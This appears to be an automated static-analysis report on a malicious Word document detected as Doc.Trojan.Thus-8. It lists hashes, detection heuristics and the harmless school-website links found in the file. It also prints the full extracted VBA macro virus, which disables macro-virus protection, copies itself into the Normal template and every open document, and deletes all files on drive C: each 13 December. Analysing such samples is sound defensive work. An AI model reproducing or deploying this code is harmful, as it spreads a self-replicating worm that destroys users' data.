Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cc56d434bff5dfb4…

MALICIOUS

Office (OLE)

124.5 KB Created: 2008-06-18 02:41:00 Authoring application: Microsoft Word 11.5.0 First seen: 2014-06-03
MD5: 06290ba28d8c4a588b3ad61690d6b095 SHA-1: bafa00bd8109a0e2fcbc1ed9b10cca5d38a2dd54 SHA-256: cc56d434bff5dfb4e35076b67da363d002d224e466173c3849ff70f13cbf9dca
210 Risk Score

Heuristics 5

  • ClamAV: Doc.Trojan.Thus-8 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-8
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        On Error Resume Next
    Application.Options.VirusProtection = False
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Document_Open()
'Thus_001'
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.brainpopjr.com/science/plants/plantlifecycle/zoom.weml In document text (OLE body)
    • http://its.guilford.k12.nc.us/webquests/plants/plants1.htmIn document text (OLE body)
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week1/v1/index.htmlIn document text (OLE body)
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week1/s1/game1_type1/index.htmlIn document text (OLE body)
    • http://treasures.macmillanmh.com/national/students/grade2/book1/unit2/the-tiny-seed/plant-partsIn document text (OLE body)
    • http://treasures.macmillanmh.com/national/teachers/resources/grade2/research-and-inquiry-resources/resource/plant-partsIn document text (OLE body)
    • http://treasures.macmillanmh.com/national/students/grade2/book1/unit2/the-tiny-seed/plant-parts/rubricIn document text (OLE body)
    • http://treasures.macmillanmh.com/national/teachers/great-books-to-share/grade-2-reading-listIn document text (OLE body)
    • http://treasures.macmillanmh.com/national/teachers/creating-a-home-school-partnership/grade-2-letters-%C2%BBIn document text (OLE body)
    • http://www.brainpopjr.com/health/beresponsible/caringforpets/zoom.wemlIn document text (OLE body)
    • http://classroom.jc-schools.net/basic/sciplants.htmlIn document text (OLE body)
    • http://www.harcourtschool.com/activity/animalneeds/In document text (OLE body)
    • http://staff.harrisonburg.k12.va.us/~kbrantley/Plant_Webquest.htmlIn document text (OLE body)
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week2/s1/index.htmlIn document text (OLE body)
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week2/v1/index.htmlIn document text (OLE body)
    • http://www.khake.com/page64.htmlIn document text (OLE body)
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week3/s1/index.htmlIn document text (OLE body)
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week3/v1/game1_type4/index.htmlIn document text (OLE body)
    • http://treasures.macmillanmh.com/national/students/grade2/book1/unit2/time-for-kids-a-trip-to-the-emergency-room/hospitalsIn document text (OLE body)
    • http://treasures.macmillanmh.com/national/teachers/resources/grade2/research-and-inquiry-resources/resource/hospitalsIn document text (OLE body)
    • http://treasures.macmillanmh.com/national/students/grade2/book1/unit2/time-for-kids-a-trip-to-the-emergency-room/hospitals/rubricIn document text (OLE body)
    • http://www.kidskonnect.com/content/view/87/27/In document text (OLE body)
    • http://www.wms.wantaghufsd.k12.ny.us/Forest_Lake_Elem/secondgrade/scilifecycles.htmIn document text (OLE body)
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week4/s1/index.htmlIn document text (OLE body)
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week4/v1/index.htmlIn document text (OLE body)
    • http://treasures.macmillanmh.com/national/students/grade2/book1/unit2/farfallina-and-marcel/how-animals-growIn document text (OLE body)
    • http://treasures.macmillanmh.com/national/teachers/resources/grade2/research-and-inquiry-resources/resource/how-animals-growIn document text (OLE body)
    • http://treasures.macmillanmh.com/national/students/grade2/book1/unit2/farfallina-and-marcel/how-animals-grow/rubricIn document text (OLE body)
    • http://www.brainpopjr.com/health/food/foodpyramid/zoom.wemlIn document text (OLE body)
    • http://www.brainpopjr.com/health/beactive/exercise/zoom/wemlIn document text (OLE body)
    • http://www.nutritionexplorations.org/kids/activities-main.aspIn document text (OLE body)
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week5/s1/index.htmlIn document text (OLE body)
    • http://www.mhschool.com/mmh_games/content/reading/gr2/unit02/week5/v1/game1_type1/index.htmlIn document text (OLE body)
    • http://teachers.sheboygan.k12.wi.us/zking/webquest.htmlIn document text (OLE body)
    • http://streaming.discoveryeducation.com/search/assetDetail.cfm?guidAssetID=26418961-2EA8-4FE9-B7E9-4EA2C330DB08In document text (OLE body)
    • http://streaming.discoveryeducation.com/search/assetDetail.cfm?guidAssetID=D4A36B96-6F0C-48A8-A635-C1DC04A46222In document text (OLE body)
    • http://streaming.discoveryeducation.com/search/assetDetail.cfm?guidAssetID=F6E6ECD0-A045-46D8-886A-FD3B51614810In document text (OLE body)
    • http://streaming.discoveryeducation.com/search/assetDetail.cfm?guidAssetID=41DE3285-F99A-4898-985A-6C4B55DF854FIn document text (OLE body)
    • http://player.discoveryeducation.com/index.cfm?guidAssetId=069DFDAC-28EB-46DD-AD31-E9EE51233A0E&blnFromSearch=1&productcode=USIn document text (OLE body)
    • http://teacher.scholastic.com/commclub/In document text (OLE body)
    • http://www.hud.gov/kids/whatsjob.htmlIn document text (OLE body)
    • http://www.woodlands-junior.kent.sch.uk/revision/Science/living.htmIn document text (OLE body)
    • http://www.food.gov.uk/multimedia/flash/a_healthy_lunchbox_intro.swfIn document text (OLE body)
    • http://www.nfpa.org/RiskWatch/kids.htmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2369 bytes
SHA-256: aa92088ec826fb2718584539035df609af62307bde39883f630f395c8c1015d9
Detection
ClamAV: Doc.Trojan.Thus-8
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Thus_001'
    On Error Resume Next
    Application.Options.VirusProtection = False
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
    .CodeModule.CountOfLines
    End If
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
    .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
    .Item(1).CodeModule.CountOfLines)
    End If
    If NormalTemplate.Saved = False Then NormalTemplate.Save
    For k = 1 To Application.Documents.Count
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_001'" Then
    Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
    .CodeModule.DeleteLines 1, Application.Documents.Item(k) _
    .VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    End If
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
    .CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
    .Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
    .VBComponents.Item(1).CodeModule.CountOfLines)
    End If
    Next k
    If (Day(Now()) = 13) And (Month(Now()) = 12) Then
    With Application.FileSearch
        .NewSearch
        .LookIn = "C:\"
        .SearchSubFolders = True
        .FileName = "*.*"
        .MatchTextExactly = False
        .FileType = msoFileTypeAllFiles
        If .Execute > 0 Then
        For i = 1 To .FoundFiles.Count
        Kill .FoundFiles(i)
        Next i
        End If
    End With
    End If
End Sub
Private Sub Document_Close()
    Document_Open
End Sub
Private Sub Document_New()
    Document_Open
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.